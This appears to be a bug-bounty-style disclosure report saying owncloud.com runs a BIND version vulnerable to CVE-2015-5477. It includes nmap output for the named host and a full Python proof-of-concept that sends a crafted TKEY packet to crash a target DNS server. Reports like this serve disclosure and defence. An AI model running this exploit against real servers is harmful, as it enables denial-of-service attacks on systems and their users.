owncloud.com appears to be vulnerable to CVE-2015-5477 based on the running version of BIND. This allows attackers to launch Denial of Service attacks against owncloud.com which would result in the owncloud server to stop responding and even reboot. It is recommended to upgrade to the latest version of ISC Bind.

NMap Scan Results:
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-15 14:37 EDT
Warning: 50.30.33.235 giving up on port because retransmission cap hit (6).
Nmap scan report for owncloud.com (50.30.33.235)
Host is up (0.041s latency).
rDNS record for 50.30.33.235: www.owncloud.com
Not shown: 993 closed ports, 3 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8 (protocol 2.0)
| ssh-hostkey:
| 1024 96:ad:80:e0:cb:33:02:47:67:6b:1c:f1:29:7e:e7:c6 (DSA)
| 1024 68:ee:34:57:52:e5:fe:7b:7b:32:86:d9:99:57:08:73 (RSA)
|_ 256 fb:b8:b5:5b:7a:b2:46:61:f2:87:e7:2b:0d:c7:bc:2d (ECDSA)
53/tcp open domain
| dns-nsid:
|_ bind.version: 9.9.4-rpz2.13269.14-P2

Exploit PoC:

Exploit Title: PoC for BIND9 TKEY DoS

Exploit Author: elceef

Software Link: https://github.com/elceef/tkeypoc/

Version: ISC BIND 9

Tested on: multiple

CVE : CVE-2015-5477

#!/usr/bin/env python

import socket
import sys

print(‘CVE-2015-5477 BIND9 TKEY PoC’)

if len(sys.argv) < 2:
print(‘Usage: ’ + sys.argv[0] + ’ [target]’)
sys.exit(1)

print(‘Sending packet to ’ + sys.argv[1] + ’ …’)

payload = bytearray(‘4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41’.replace(’ ', ‘’).decode(‘hex’))

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], 53))

print(‘Done.’)

CVE Details:
https://vulners.com/cve/CVE-2015-5477